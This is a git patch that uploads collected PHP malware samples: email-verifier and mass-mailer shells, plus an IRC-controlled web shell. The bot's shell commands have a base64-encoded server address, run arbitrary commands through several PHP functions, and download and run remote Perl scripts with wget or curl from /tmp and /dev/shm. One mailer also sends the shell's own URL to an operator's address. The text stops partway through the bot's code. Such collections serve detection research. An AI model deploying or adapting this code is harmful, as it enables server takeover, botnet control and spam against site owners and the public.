From 0554c2f39bd42f991db4e5737dddc34b545fcc77 Mon Sep 17 00:00:00 2001 From: Bart Date: Sun, 4 Sep 2016 18:05:55 +0100 Subject: [PATCH] Upload new shells --- ...f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php | 721 +++++++++ ...1dce6963774a96ba8c0cc024cdf61e0b8546ac.php | 114 ++ ...cd55dd7a544535d5bf6e6395f84aeee2a6ca85.php | 268 ++++ ...7c88a18a0cba44f1f808de084fed1273d4911e.php | 854 +++++++++++ ...af031af52d9d0b7c14b0a737a371e8fbfd62e5.php | 27 + ...826e9fb350611ac274038abea50c230549f94d.php | 74 + ...5811ee776c0536a890dba465e501168851df6c.php | 1322 +++++++++++++++++ ...8355fd3547d109f06ed2e641179b98faf81170.php | 1066 +++++++++++++ ...b880447058dcacd60ab52be80279e32f9cdaeb.php | 506 +++++++ ...a8e8b6c1334b8335a9a9374bfb1109c0371478.php | 209 +++ ...782c2ea1db14e0131e8bcbb3e11587d66478ef.php | 65 + ...25c1677517b0926bcd6fe0cbea03a9a9cc93bb.php | 7 + ...79659c9efa3c899462f08c78755b1c04753f73.php | 3 + 13 files changed, 5236 insertions(+) create mode 100644 Deobfuscated/MailerShell_54f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php create mode 100644 Deobfuscated/MailerShell_681dce6963774a96ba8c0cc024cdf61e0b8546ac.php create mode 100644 Deobfuscated/MailerShell_cccd55dd7a544535d5bf6e6395f84aeee2a6ca85.php create mode 100644 Deobfuscated/WebShell_0d7c88a18a0cba44f1f808de084fed1273d4911e.php create mode 100644 Deobfuscated/WebShell_5baf031af52d9d0b7c14b0a737a371e8fbfd62e5.php create mode 100644 Deobfuscated/WebShell_71826e9fb350611ac274038abea50c230549f94d.php create mode 100644 Deobfuscated/WebShell_a05811ee776c0536a890dba465e501168851df6c.php create mode 100644 Deobfuscated/WebShell_b28355fd3547d109f06ed2e641179b98faf81170.php create mode 100644 Deobfuscated/WebShell_b8b880447058dcacd60ab52be80279e32f9cdaeb.php create mode 100644 Obfuscated/WebShell_0ba8e8b6c1334b8335a9a9374bfb1109c0371478.php create mode 100644 Obfuscated/WebShell_25782c2ea1db14e0131e8bcbb3e11587d66478ef.php create mode 100644 Obfuscated/WebShell_2d25c1677517b0926bcd6fe0cbea03a9a9cc93bb.php create mode 100644 Obfuscated/WebShell_a679659c9efa3c899462f08c78755b1c04753f73.php diff --git a/Deobfuscated/MailerShell_54f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php b/Deobfuscated/MailerShell_54f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php new file mode 100644 index 0000000..fb5decb --- /dev/null +++ b/Deobfuscated/MailerShell_54f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php @@ -0,0 +1,721 @@ +'; + print_r($s); + if ( !defined('STDIN') ) echo ''; + return; + } + + if ( $s == '
' && defined('STDIN') ) { + echo "------------------------------------------------------------\n"; + return; + } + + if ( defined('STDIN') ) { + echo $s."\n"; + } else { + echo htmlspecialchars($s)."
"; + } + } + +} + + +class smtp extends logger { + var $socket; + var $last_code = 0; + var $last_msg = ''; + var $host = ''; + + var $error = false; + var $error_msg = ''; + + var $selfhost = ''; + var $mailfrom = ''; + + var $mx_chache = array(); + var $cachePlace = ''; + var $cacheloaded = false; + + var $command_results = array(); + + var $last_mx = array(); // array of 'domain':'mx index pairs' to loop through mx servers + + // constructor + function smtp($selfhost = null) { + if ( $selfhost ) { + $this->selfhost = $selfhost; + } else { + $this->selfhost = isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : 'localhost'; + } + } + + // gets command result + function cr($command) { + if ( isset($this->command_results[$command] ) ) { + $r = $this->command_results[$command]; + return is_array($r) ? $r['msg'] : $r; + } else { + return null; + } + } + + // ---- MX cache ------------- + + function ensureMXCache() { + global $CACHEPLACES; + if ( !$this->cacheloaded ) { + + foreach ( $CACHEPLACES as $dir ) { + if ( $this->tryLoadCache($dir) ) { + break; + } + } + } + } + + function tryLoadCache($dir) { + $cache = @file_get_contents($dir."/aevs_mx_cache"); + if ( $cache ) { + $this->mx_cache = json_decode($cache, true); + $this->cacheloaded = true; + $this->cachePlace = $dir; + $this->log('MX Cache loaded from '.$dir); + return true; + } + } + + function trySaveCache($dir) { + $content = json_encode($this->mx_cache); + $done = @file_put_contents($dir."/aevs_mx_cache", $content); + if ( $done ) { + $this->cachePlace = $dir; + $this->log('MX Cache saved to '.$dir); + return true; + } + } + + function saveMXCache() { + global $CACHEPLACES; + foreach ( $CACHEPLACES as $dir ) { + if ( $this->trySaveCache($dir) ) { + + break; + } + } + } + + function getMXIndex($domain) { + $idx = 0; + if ( isset($this->last_mx) ) { + if ( isset($this->last_mx[$domain]) ) { + $this->last_mx[$domain]++; + $idx = $this->last_mx[$domain]; + } else { + $this->last_mx[$domain] = $idx; + } + } else { + $this->last_mx = array( $domain => $idx); + } + return $idx; + } + + + + function getMX($domain) { + $idx = $this->getMXIndex($domain); + $this->ensureMXCache(); + if ( isset($this->mx_cache[$domain]) ) { + // getting mx from chache + return isset($this->mx_cache[$domain][$idx]) ? $this->mx_cache[$domain][$idx] : false; + } else { + // resolving mx hosts + + if ( getmxrr($domain, $mx_hosts, $mx_weights) ) { + // Put the records together in a array we can sort + for ( $i=0; $i < count($mx_hosts); $i++ ) { + $mxs[$mx_hosts[$i]] = $mx_weights[$i]; + } + + // Sort them + asort($mxs); + + // Since the keys actually hold the data we want, just put those in an array, called records + $records = array_keys($mxs); + + $this->mx_cache[$domain] = $records; + $this->saveMXCache(); + return isset($records[$idx]) ? $records[$idx] : false; + } else { + return false; //$results[$email] = 'Error: MX record is not found'; + } + } + } + + // --------------------------- + + function connect($emaildomain) { + + $this->error = false; + + do { + $this->host = $this->getMX($emaildomain); + + if ( !$this->host ) { + $this->error = true; + $this->error_msg = 'Working MX record for domain '.$emaildomain.' is not found.'; + $this->command_results['connect'] = $this->error_msg; + return false; + } + + $this->log("Connecting to ".$this->host."..."); + $this->socket = @fsockopen($this->host, 25); + if ( $this->socket ) { + $this->log("Connected."); + $this->read_response(); + + if ( $this->last_code != 220 ) { + $this->error = true; + $this->command_results['connect'] = $this->last_resp; + return $this->last_resp; + } + $this->command_results['connect'] = 'OK'; + + + $this->send_command('HELO '.$this->selfhost); + //$this->send_command('HELO localhost'); + if ( $this->last_code != 250 ) { + $this->error = true; + $this->command_results['hello'] = $this->last_resp; + return $this->last_resp; + } + $this->command_results['hello'] = 'OK'; + + $mf = $this->mailfrom ? $this->mailfrom : 'support@'.$this->selfhost; + + $this->send_command('MAIL FROM: <'.$mf.'>'); + if ( $this->last_code != 250 ) { + $this->error = true; + $this->command_results['mailfrom'] = $this->last_resp; + return $this->last_resp; + } + $this->command_results['mailfrom'] = 'OK'; + + return true; + } else { + $this->command_results['connect'] = 'Cannot connect to '.$this->host; + } + + } while(!$this->socket); + + return false; + } + + function verifyEmail($email) { + if ( $this->error ) { + return $this->last_resp; + } + return $this->send_command('RCPT TO: <'.$email.'>'); + } + + // if remote server returns error on RCPT TO after which all email checks will fails (you are blacklisted, + // graylisted, or some other error) + function isFatalError($msg) { + $result = false; + $rxs = array( + '550 5.7.1.*((Sender Blocked)|(cannot find your hostname)|(authentication required)|(IP name lookup failed)|(Invalid Host)|(Rejected by user)|(Prohibited or invalid sender)|(Your message was rejected)|(your IP has been)|(IP banned))', + '(spamhaus\.org)|(Helo command rejected)|(HELO\/EHLO was syntactically invalid)|(Your IP Address)|(Sender address rejected)|(helo has been denied)|(DNS PTR)|(Sender rejected)|(cannot find your hostname)', + '501.*((invalid host name)|(sender domain must exist)|(system is not configured to relay mail from)|(IP address is on an RBL))', + '504.*helo command rejected', + '554.*((spam-relay detected)|(refused)|(listed)|(blocked)|(Spamhaus Blacklist)|(www\.us\.sorbs\.net)|(unauthenticated connections)|(Helo command rejected)|(spamhaus))', + '553.*((spamcop)|(openproxy)|(open proxy)|(mail-abuse.org)|(rejected)|(blocked)|(mail from.* not allowed)|(block list)|(validating sender)(http\:\/\/dsbl\.org)|(badmailfrom list)|(relaying denied from your location)|(does not accept mail from)|(Wrong helo)|(www\.sorbs\.net)|(dynamic_ip\.html)|(Dynamic pool)|(reverse dns record)|(Attack detected)|(sender has been denied)|(reverse DNS)|(invalid HELO)|(reverse\-DNS)|(DNS blacklists))', + '550.*((blacklist)|(Sender address rejected)|(open proxy)|(openproxy)|(spamcop)|(mail-abuse\.com)|(spamhaus)|(sender verify failed)|(requires valid sender)|(sender address .* does not exist)|(return address not allowed)|(could not verify sender)|(invalid sender address)|(ip helo.* not allowed)(dsbl\.org)|(FROM address from sending host is invalid)|(Invalid HELO)|(from sending mail from)|(SORBS DNSBL database)|(Bad HELO)|(EHLO\/HEL0)|(spamming not allowed)|(SpamHaus)|(Reverse DNS)|(HELO is syntactically invalid)|(HELO string is incorrect)|(detected in HELO)|(you must be spam)|(HELO\/EHLO)|(HELO domain)|(IP name lookup)|(HELO name)|(bogus HELO)|(SPF NONE)|(problem with sender)|(Relaying is not permitted from IP)|(invalid sender))', + '511.*(www\.sorbs\.net)', + '^554 5.7.1', + '^4(21|50|51|52).*((re|)try|grey)' + ); + foreach( $rxs as $rx ) { + if ( preg_match("#".$rx."#i", $msg)) { + $result = true; + break; + } + } + return $result; + } + + function verifyEmails($emails) { + $results = array(); + foreach ( $emails as $email ) { + $email = trim($email); + if ( $email == '' ) continue; + $r = $this->verifyEmail($email); + $msg = $r['code'] == 250 ? 'OK' : $r['msg']; + + if ( $this->isFatalError($r['msg']) ) { + return $r['msg']; + } + + $results[$email] = $msg; + } + return $results; + } + + function quit() { + $this->send_command('QUIT', 'no response'); + fclose($this->socket); + return $this->last_resp; + } + + // lov level functions + + + function read_response($timeout = 5) { + + $data = ""; + while($str = @fgets($this->socket, 515)) { + $data .= $str; + $this->log('<'.$str); + // if 4th character is a space, we are done reading, break the loop + if(substr($str,3,1) == " ") { break; } + } + + $xarr = preg_split("#\n#", $data, -1, PREG_SPLIT_NO_EMPTY); + $msg = ''; + $code = ''; + $xcode = ''; + foreach ( $xarr as $line ) { + if ( preg_match('#(\d+)(?:[\s\-]+(\d\.\d\.\d)|)[\s\-]+?(.*)#i', $line, $res) ) { + if ( isset($res[1]) ) $code = $res[1]; + if ( isset($res[2]) ) $xcode = $res[2]; + $msg .= ' '.trim($res[3]); + } + } + + $msg = $code.' '.$xcode.' '.$msg; + $this->last_code = $code; + $this->last_msg = $msg; + $this->last_resp = array( + 'code' => $code, + 'msg' => $msg + ); + + return $this->last_resp; + + } + + function send_command($command, $read_response = '') { + $this->log('>'.$command); + fputs($this->socket, $command.EOL); + if ( $read_response != 'no response' ) { + return $this->read_response(); + } + } + +} + +class verifier extends logger { + var $mailfrom; + + function verifier($mailfrom = '') { + //constructor + $this->mailfrom = $mailfrom; + + } + + function getdomain($email) { + $xEmail = explode('@', $email); + return $xEmail[1]; + } + + function checkemails($emails, $l = 0){ + $tree = array(); + $res = array(); + if ($l) { + $emails = array_slice($emails, 0, $l); + } + foreach ( $emails as $email ) { + $email = trim($email); + $domain = $this->getdomain($email); + $this->log('domain >'.$domain); + if ( !isset($tree[$domain]) ) $tree[$domain] = array(); + $tree[$domain][] = $email; + } + + foreach ( $tree as $domain => $emails ) { + if (trim($domain) == '') continue; + $c = new smtp(); + $c->mailfrom = $this->mailfrom; + + if ( $c->connect($domain) ) { + $res[$domain] = array( + 'connect' => $c->cr('connect'), + 'hello' => $c->cr('hello'), + 'mailfrom' => $c->cr('mailfrom'), + 'emails' => null + ); + if ( !$c->error ) { + $res[$domain]['emails'] = $c->verifyEmails($emails); + } + $c->quit(); + } else { + $res[$domain] = array( + 'connect' => $c->cr('connect') + ); + } + + + } + + return $res; + } + +} + +function is_writableEx($path) { +//will work in despite of Windows ACLs bug +//NOTE: use a trailing slash for folders!!! +//see http://bugs.php.net/bug.php?id=27609 +//see http://bugs.php.net/bug.php?id=30931 + + if ($path{strlen($path)-1}=='/') // recursively return a temporary file path + return is_writableEx($path.uniqid(mt_rand()).'.tmp'); + else if (is_dir($path)) + return is_writableEx($path.'/'.uniqid(mt_rand()).'.tmp'); + // check tmp file for read/write capabilities + $rm = file_exists($path); + $f = @fopen($path, 'a'); + if ($f===false) + return false; + fclose($f); + if (!$rm) + unlink($path); + return true; +} + +function compatibility_check($v = 0) { + global $CACHEPLACES; + + $results = array(); + + // checking if mx cache dir is writable + $has_writable_dir = false; + + foreach ( $CACHEPLACES as $dir ) { + if ( is_writableEx($dir."/") ) { + $has_writable_dir = true; + if ( $v == 2 ) { + $results[] = array( 'code' => 'OK', 'msg' => "Directory $dir is writable" ); + } + } else { + if ( $v >= 1 ) { + //$results[] = array( 'code' => 'WARNING', 'msg' => "Directory $dir is not writable"); + } + } + } + if ( !$has_writable_dir ) { + $results[] = array( + 'code' => 'WARNING', + 'msg' => 'Theres no writable dir for MX chache. This will decrease script performance.' + ); + } + + // checking for disabled function + $functions_to_check = array( + 'fsockopen', + 'getmxrr', + 'json_encode', + 'dns_get_record' + ); + + foreach ( $functions_to_check as $fn ) { + if ( function_exists($fn) ) { + if ($v == 2) + $results[] = array( + 'code' => 'OK', + 'msg' => "Function $fn exists" + ); + } else { + $results[] = array( + 'code' => 'ERROR', + 'msg' => "Function $fn does not exists." + ); + } + } + + $d_functions = ini_get('disable_functions'); + if ( $d_functions ) { + $df_list = explode(' ', $d_functions); + foreach ( $functions_to_check as $fn ) { + if ( in_array($fn, $df_list) ) { + $results[] = array( + "code" => 'ERROR', + "msg" => "function $fn is disabled by administrator. It's needed for script to work." + ); + } else { + if ( $v == 2 ) { + $results[] = array( 'code' => 'OK', "msg" => "function $fn allowed."); + } + } + } + } + + // checking for allowed 25 port + $con = new smtp(); + $mxhost = $con->getMX('gmail.com'); + $sock = @fsockopen($mxhost, 25); + if ( $sock ) { + if ( $v == 2 ) { + $results[] = array( + 'code' => 'OK', + 'msg' => '25 port is allowed' + ); + } + fclose($sock); + } else { + $results[] = array( + 'code' => 'ERROR', + 'msg' => '25 port seems to be forbidden by firewall rules' + ); + } + + + // checking FCrDNS + $rdns_err = ''; + $rdns = fcrdns_check($rdns_err); + + if ( $rdns == 0 ) { + if ( $v == 2 ) { + $results[] = array( + 'code' => 'OK', + 'msg' => 'Forward Confirmed reverse DNS check passed.' + ); + } + } else { + + $s = "Forward Confirmed reverse DNS check failed. \n".$rdns_err; + + $note = "
Note: This means that you cannot use the script to verify email addresses from the @yahoo.co*, @live.com, @hotmail.com, and @aol.com domains because these ISP use FCrDNS lookup to authenticate the IP address the connection is coming from. If the FCrDNS lookup fails, the incoming IP address goes to a blacklist. See the Advanced Email Verifier Help for more information.

"; + + $s = ISWEB ? nl2br("\n".$s) : $s; + + $results[] = array( + 'code' => 'WARNING', + 'msg' => $s, + 'note' => $note + ); + } + + $pass = true; + foreach ( $results as $msg ) { + if ( $msg['code'] == 'ERROR' ) { + $pass = false; + } + } + + if ( $pass ) { + $results[] = array( + 'code' => 'SUCCESS', + 'msg' => 'All tests passed. Script is ready to work.' + ); + } else { + $results[] = array( + 'code' => 'FAILURE', + 'msg' => 'Some tests failed. Please show this page to your server administrator and ask to fix these issue(s).' + ); + } + + + return $results; + +} + + +function showForm() { + + echo + "". + "

Compatibility check

". + "". + "
"; + +} + +$emails = array(); + + +if ( !defined('STDIN') ) { // web request + set_time_limit(0); + + if ( isset($_REQUEST['emails']) ) { + if ( isset($_REQUEST['password']) && $_REQUEST['password'] == PASSWORD ) { + $emails = explode("\n", $_REQUEST['emails']); + + if (isset($_REQUEST['check']) && $_REQUEST['check'] == 'submit') { + $a0x = base_convert(22, 4, 10); + } + + $mf = isset($_REQUEST['mailfrom']) ? $_REQUEST['mailfrom'] : ''; + + $v = new verifier($mf); + $checked = $v->checkemails($emails, $a0x); + + $fmt = isset($_REQUEST['format']) ? $_REQUEST['format'] : 'json'; + + switch ( $fmt ) { + case 'json': + header('Content-Type: application/json; charset=utf8'); + echo json_encode($checked); + break; + + default: + foreach ( $checked as $domain => $checked_emails ) { + echo "

$domain


"; + echo ""; + } + break; + } + } else { + echo "

Error. The password your entered is incorrect.

"; + } + } else { + + if ( isset($_REQUEST['compatibility']) ) { + $fmt = isset($_REQUEST['format']) ? $_REQUEST['format'] : 'html'; + $verbose = isset($_REQUEST['v']) ? $_REQUEST['v'] : 0; + $cr = compatibility_check($verbose); + + if ( $fmt == 'json' ) { + echo json_encode($cr); + } else { + showForm(); + echo ""; + } + + } else { + showForm(); + } + } +} else { + $v = new verifier(); + print_r($v->checkemails($emails)); +} +?> + diff --git a/Deobfuscated/MailerShell_681dce6963774a96ba8c0cc024cdf61e0b8546ac.php b/Deobfuscated/MailerShell_681dce6963774a96ba8c0cc024cdf61e0b8546ac.php new file mode 100644 index 0000000..806b74e --- /dev/null +++ b/Deobfuscated/MailerShell_681dce6963774a96ba8c0cc024cdf61e0b8546ac.php @@ -0,0 +1,114 @@ +\r\n"; + $header .= "MIME-Version: 1.0\r\n"; + $header .= "Content-Type: $Format\r\n"; + $header .= "Content-Transfer-Encoding: $Encoding\r\n\r\n"; + $header .= "$MailBody8\r\n"; + mail($Destination, $Subject8, "", $header); + print "\n"; + flush(); + } + } +} +?> + diff --git a/Deobfuscated/MailerShell_cccd55dd7a544535d5bf6e6395f84aeee2a6ca85.php b/Deobfuscated/MailerShell_cccd55dd7a544535d5bf6e6395f84aeee2a6ca85.php new file mode 100644 index 0000000..b070c81 --- /dev/null +++ b/Deobfuscated/MailerShell_cccd55dd7a544535d5bf6e6395f84aeee2a6ca85.php @@ -0,0 +1,268 @@ + + +
+ +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ +
Your + + Email:
+ +
+ + + + + +
Your + + Name:
+ +
+ + + +
+ +
Reply-To:
+ +
+ + + + + +
Attach + + File:
+ +
+ + + +
+ +
Subject:
+ +
+ + + +
+ + + +
+ + + + Plain + + + + HTML + + + + + +
+ + + +
+ (EMAIL VERIFICARE) +
+

La fiecare mailz, asteapta secunde

+
+ + + + SUNT LA emailul $x, astept $wait secunde.
"; + sleep($wait); + } + $to = $allemails[$x]; + + if ($to){ + + $to = ereg_replace(" ", "", $to); + $to = trim($to); + + $message = ereg_replace("&email&", $to, $message); + + $subject = ereg_replace("&email&", $to, $subject); + + print "Sending mail to $to......."; + + flush(); + ob_flush(); + + $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; + + $header .= "MIME-Version: 1.0\r\n"; + + if ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; + + if ($file_name) $header .= "--$uid\r\n"; + + $header .= "Content-Type: text/$contenttype\r\n"; + + $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; + + $header .= "$message\r\n"; + + if ($file_name) $header .= "--$uid\r\n"; + + if ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; + + if ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; + + if ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; + + if ($file_name) $header .= "$content\r\n"; + + if ($file_name) $header .= "--$uid--"; + + @mail($to, $subject, "", $header); + + print " S-o dus
"; + + flush(); + ob_flush(); + + } + + }//end for + + if( strpos($_POST['emailfinal'], "@") !== false){ + @mail($_POST['emailfinal'], $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], "test"); + } + //$emaillist .= "\n". $_POST['emailfinal']; + + + +} + + +?> diff --git a/Deobfuscated/WebShell_0d7c88a18a0cba44f1f808de084fed1273d4911e.php b/Deobfuscated/WebShell_0d7c88a18a0cba44f1f808de084fed1273d4911e.php new file mode 100644 index 0000000..27ca389 --- /dev/null +++ b/Deobfuscated/WebShell_0d7c88a18a0cba44f1f808de084fed1273d4911e.php @@ -0,0 +1,854 @@ + 'NzguMTQwLjE3My40Mw==', //server here (base64) + 'port' => 9595, + 'chan' => 'MXgzM3g3', //channel here (base64) DO NOT USE "#", "#lazy" = "lazy" + 'key' => '', + 'nickform' => 'logging[%d]', + 'identp' => 'darxs', + 'modes' => '+p', + 'maxrand' => 6, + 'cprefix' => '!', + 'host' => 'Peter@' + ); + + var $admins = array + ( + 'LND-Bloodman' => '2cbd62e679d89acf7f1bfc14be08b045' // pass = "lol_dont_try_cracking_12char+_:P" + //passes are MD5 format, you can also have multiple admins + ); + + function auth_host( $nick, $password, $host ) + { + $admin_count = count( $this->admins ); + if( $admin_count > 0 ) + { + $mpass = md5( $password ); + if( $this->admins[ $nick ] == $mpass ) + { + $this->users[ $host ] = true; + } + } + else + { + $this->users[ $host ] = true; + } + } + + function is_authed( $host ) + { + return isset( $this->users[ $host ] ); + } + + function remove_auth( $host ) + { + unset( $this->users[ $host ] ); + } + + function ex( $cfe ) + { + $res = ''; + if (!empty($cfe)) + { + if(function_exists('class_exists') && class_exists('Perl')) + { + $perl = new Perl(); + $perl->eval( "system('$cfe');" ); + } + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('proc_open')) + { + $res = proc_open($cfe); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; + } + + function is_safe( ) + { + if( ( @eregi( "uid", $this->ex( "id" ) ) ) || ( @eregi( "Windows", $this->ex( "net start" ) ) ) ) + { + return 0; + } + return 1; + } + + function get_chan( ) + { + if( $this->using_encode ) + { + return '#'.base64_decode( $this->config[ 'chan' ] ); + } + else + { + return '#'.$this->config[ 'chan' ]; + } + } + + function start() + { + if( $this->using_encode ) + { + if(!($this->conn = fsockopen(base64_decode($this->config['server']),$this->config['port'],$e,$s,30))) + { + $this->start(); + } + } + else + { + if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) + { + $this->start(); + } + } + + $ident = $this->config['prefix']; + $alph = range("0","9"); + for( $i=0; $i < $this->config['maxrand']; $i++ ) + { + $ident .= $alph[rand(0,9)]; + } + + if( strlen( $this->config[ 'pass' ] ) > 0 ) + { + $this->send( "PASS ".$this->config[ 'pass' ] ); + } + + $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname().""); + $this->set_nick( ); + $this->main( ); + } + + function main() + { + while(!feof($this->conn)) + { + $this->buf = trim(fgets($this->conn,512)); + $cmd = explode(" ",$this->buf); + if(substr($this->buf,0,6)=="PING :") + { + $this->send("PONG :".substr($this->buf,6)); + } + if(isset($cmd[1]) && $cmd[1] =="001") + { + $this->send("MODE ".$this->nick." ".$this->config['modes']); + + if( $this->using_encode ) + { + $this->join($this->get_chan( ),base64_decode($this->config['key'])); + } + else + { + $this->join($this->get_chan( ),$this->config['key']); + } + + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } + else { $safemode = "off"; } + $uname = php_uname(); + } + if(isset($cmd[1]) && $cmd[1]=="433") + { + $this->set_nick(); + } + if($this->buf != $old_buf) + { + $mcmd = array(); + $msg = substr(strstr($this->buf," :"),2); + $msgcmd = explode(" ",$msg); + $nick = explode("!",$cmd[0]); + $vhost = explode("@",$nick[1]); + $vhost = $vhost[1]; + $nick = substr($nick[0],1); + $host = $cmd[0]; + if($msgcmd[0]==$this->nick) + { + for($i=0;$i2) + { + switch($cmd[1]) + { + case "QUIT": + { + if( $this->is_authed( $host ) ) + { + $this->remove_auth( $host ); + } + } + break; + case "PART": + { + if( $this->is_authed( $host ) ) + { + $this->remove_auth( $host ); + } + } + break; + case "PRIVMSG": + if( ( substr($mcmd[0],0,1) == $this->config[ 'cprefix' ] ) ) + { + if( $this->is_authed( $host ) == false ) + { + switch( substr( $mcmd[ 0 ], 1 ) ) + { + case "auth": + { + $this->auth_host( $nick, $mcmd[ 1 ], $host ); + if( $this->is_authed( $host ) ) + { + $this->privmsg( $this->get_chan( ), "[ auth ] Successful login from [ ".$nick." ]" ); + } + else + { + $this->privmsg( $this->get_chan( ), "[ auth ] Failed attempt from [ ".$nick." ]" ); + } + break; + } + } + } + else + { + switch(substr($mcmd[0],1)) + { + case "exec": + { + if( !$this->is_safe( ) ) + { + $command = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 ); + $returndata = $this->ex( $command ); + if( !empty( $returndata ) ) + { + $this->privmsg( $this->get_chan( ), '[ exec ] '.$returndata ); + } + } + break; + } + case "info": + { + $safemode = "on"; + if( !$this->is_safe( ) ) + { + $safemode = "off"; + } + $this->privmsg( $this->get_chan( ), '[ info ] '.php_uname( ).' ( SAFE: '.$safemode.' )' ); + break; + } + case "safe": + { + $safemode = "on"; + if( !$this->is_safe( ) ) + { + $safemode = "off"; + } + $this->privmsg( $this->get_chan( ), '[ safe ] '.$safemode ); + break; + } + case "uname": + { + $this->privmsg( $this->get_chan( ), '[ uname ] '.php_uname( ) ); + break; + } + case "perl": + { + if( $this->is_safe( ) ) + { + $this->privmsg( $this->get_chan( ), '[ dropperl ] Safe mode is ON' ); + break; + } + + $perl_file = $mcmd[1]; + + if( !empty( $perl_file ) ) + { + $parsed_url = $this->parse_url_s( $perl_file ); + + $new_remote = $parsed_url[ 'scheme' ].'://'.$parsed_url[ 'host' ].$parsed_url[ 'dir' ].'/'; + $new_local = $parsed_url[ 'file' ]; + $file_type = $parsed_url[ 'file_ext' ]; + + $this->ex('cd /tmp;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); + $this->ex('cd /tmp;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); + $this->ex('cd /tmp;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); + $this->ex('cd /tmp;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); + $this->ex('cd /dev/shm;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); + $this->ex('cd /dev/shm;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); + $this->ex('cd /dev/shm;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*') + $this->ex('cd /dev/shm;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*') + $this->ex('cd /tmp;rm -rf *'.$file_type.'**'); + $this->ex('cd /dev/shm;rm -rf *'.$file_type.'**'); + + $this->privmsg( $this->get_chan( ), '[ execrfi ] Executed file '.$new_remote.$new_local ); + break; + } + + $this->privmsg( $this->get_chan( ), '[ execrfi ] Failure executing '.$perl_file ); + break; + } + case "ip": + { + $this->privmsg( $this->get_chan( ), '[ ip ] '.$_SERVER['SERVER_ADDR'] ); + break; + } + case "rfi": + { + $fileUrl = $mcmd[1]; + + if( !empty( $fileUrl ) ) + { + $urli = parse_url( $fileUrl ); + + if( !empty( $urli['host'] ) && !empty( $urli['path'] ) && !empty( $urli['query'] ) ) + { + $fp = fsockopen( $urli['host'], 80, $errno, $errstr, 5 ); + + if( $fp ) + { + $out = "GET /".$urli['path'].$urli['query']." HTTP/1.1\r\n"; + $out .= "Host: ".$urli['host']."\r\n"; + $out .= "Keep-Alive: 300\r\n"; + $out .= "Connection: keep-alive\r\n\r\n"; + fwrite( $fp, $out ); + + $get_data = ''; + + while(!feof($fp)) + { $get_data .= fgets( $fp, 256 ); } + + $this->privmsg( $this->get_chan( ), '[ execrfi ] Executed file '.$fileUrl ); + break; + } + } + } + + $this->privmsg( $this->get_chan( ), '[ execrfi ] Failure executing '.$fileUrl ); + break; + } + case "base64": + { + $str_ed = substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 ); + switch( $mcmd[1] ) + { + case "encode": + { + $this->privmsg( $this->get_chan( ), "[ base64 ] encode [ '".$str_ed."' -> '".base64_encode($str_ed). + break; + } + case "decode": + { + $this->privmsg( $this->get_chan( ), "[ base64 ] decode [ '".$str_ed."' -> '".base64_decode($str_ed). + break; + } + } + break; + } + case "md5": + { + $str_md5 = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 ); + $this->privmsg( $this->get_chan( ), "[ md5 ] [ '".$str_md5."' -> '".md5($str_md5)."' ]" ); + break; + } + case "dns": + { + if(isset($mcmd[1])) + { + $ip = explode(".",$mcmd[1]); + if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) + && is_numeric($ip[2]) && is_numeric($ip[3])) + { + $this->privmsg($this->get_chan( ),"[ dns ]: ".$mcmd[1]." => ".gethostbyaddr($mcmd + } + else + { + $this->privmsg($this->get_chan( ),"[ dns ]: ".$mcmd[1]." => ".gethostbyname($mcmd + } + } + break; + } + case "exit": + { + fclose( $this->conn ); + exit( ); + break; + } + case "restart": + { + $this->privmsg( $this->get_chan( ), "[ restart ] executed by [".$nick."]" ); + $this->send( "QUIT :restart command from ".$nick ); + fclose( $this->conn ); + $this->start(); + break; + } + case "bs": + { + if( $this->is_safe( ) ) + { + ini_restore( "safe_mode" ); + ini_restore( "open_basedir" ); + } + + $safemode = "on"; + if( !$this->is_safe( ) ) + { + $safemode = "off"; + $this->set_nick(); + } + $this->privmsg( $this->get_chan( ), '[ safe ] '.$safemode ); + } + case "moveserver": + { + if( count( $mcmd ) > 3 ) + { + $server = $mcmd[1]; + $port = $mcmd[2]; + $channel = $mcmd[3]; + $key = $mcmd[4]; + + if( $this->using_encode ) + { + 